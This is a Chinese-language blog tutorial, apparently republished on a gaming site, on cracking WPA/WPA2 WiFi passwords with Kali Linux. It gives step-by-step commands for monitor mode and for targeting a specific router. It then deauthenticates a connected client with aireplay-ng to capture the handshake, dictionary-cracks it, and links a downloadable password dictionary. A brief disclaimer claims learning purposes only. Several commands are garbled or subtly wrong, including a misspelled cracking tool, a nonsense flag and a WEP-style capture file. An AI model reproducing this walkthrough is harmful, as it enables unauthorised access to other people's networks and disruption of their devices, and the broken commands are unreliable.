目录 前期准备 kali官网 正式开始 开启网卡监控 扫描wifi 等待抓取握手包 爆破 抓取握手包 抓取成功 开始破解 温馨提示 今天咱们来聊聊一个实用技术——如何用kali系统破解WPA/WPA2加密的WiFi密码。这个方法在渗透测试领域相当经典,掌握后对网络安全理解会更深一层。 前期准备 动手
今天咱们来聊聊一个实用技术——如何用kali系统破解WPA/WPA2加密的WiFi密码。这个方法在渗透测试领域相当经典,掌握后对网络安全理解会更深一层。
动手前需要准备好两样东西:一张支持监听模式的无线网卡(市面上20多块就能买到),还有安装了kali系统的VMware虚拟机环境。
可能有人会问,kali到底是什么?简单来说,这是一个专为渗透测试打造的Linux发行版,内置了海量安全工具,我们今天要用的功能全都依赖这个系统。
官方下载地址在这里:
https://www.kali.org/get-kali/#kali-virtual-machines
下载完虚拟机文件后,直接用VMware打开就行。系统默认登录账号是kali,密码也是kali。
首先需要查看已识别的网卡设备。接下来的操作都需要管理员权限,记得先获取root权限。
#提升权限 sudo su
#查看网卡 airmon-ng

如果这里看不到网卡,记得检查虚拟机设置里是否已经连接了USB网卡设备。

准备工作完成后,打开一个新的终端窗口。
#开启网卡监控 airmon-ng start wlan0

可以用这个命令确认网卡名称是否已经改变:
ifconfig

注意看,最后那个接口名称应该已经从wlan0变成了wlan0mon。
airodump-ng wlan0mon
扫描结果会显示周边所有WiFi信号。我们以这个名为"adcd"的WiFi为例进行演示。

扫描完成后,按ctrl+c退出,然后输入这条命令:
airodump-ng -w freedom -c 11 --bssid 9C:2E:A1:20:65:BC wlan0mon -ignore-nefative-oneaa
参数说明:-c指定信道,-w设置握手包存储名称,--bssid指定目标路由器的MAC地址。这两个关键参数需要从刚才的扫描结果中获取。


执行后界面会变成这样:

从这个界面可以清楚看到,当前有一个设备连接着这个WiFi。这里有个关键点:如果没有任何设备连接,握手包是抓不到的。
这个步骤的原理其实很简单——把已连接的设备踢下线,等它重新连接时截取认证握手包。
重新打开一个终端窗口,同样先获取管理员权限:
sudo su
然后执行这条命令,需要填入客户端的MAC地址和路由器的MAC地址:
aireplay-ng -0 2 -a 9C:2E:A1:20:65:BC -c A4:50:46:D8:74:29 wlan0mon
-a对应路由器MAC,-c对应客户端MAC。

看到成功提示后,就等着客户端自动重连吧。只要它重新连接,我们就能抓到宝贵的握手包。
当第四个步骤的终端窗口出现这个提示:

说明握手包已经到手了。特别注意:抓到包后一定要按ctrl+c退出抓包状态,否则握手包无法使用。
抓到的包默认存储在**/home/kali/**目录下,文件名是freedom-01.ivs。

建议把密码字典也放在同一个目录下:

再开一个新的终端窗口,输入破解命令:
ircrack-ng -w pass.txt freedom-*.ivs

回车后就开始了解密过程:

能否成功破解,既要看字典的强度,也需要一点运气成分。
成功破解的界面长这样:

失败的话会是这样:

有句行话说得好:kali学得精,铁窗泪盈盈。这套技术请务必仅用于学习研究目的,切勿用于非法用途。
需要字典文件的朋友不用私信了,实在回复不过来。需要的请自取百度网盘资源:
链接: https://pan.baidu.com/s/1zL1hyHvF5DGsatPsp45L3g
提取码: uq8t

这篇关于使用kali破解wifi密码的教程就到这里。想了解更多kali破解相关内容,可以搜索脚本大全的历史文章,或者继续关注后续更新。
侠游戏发布此文仅为了传递信息,不代表侠游戏网站认同其观点或证实其描述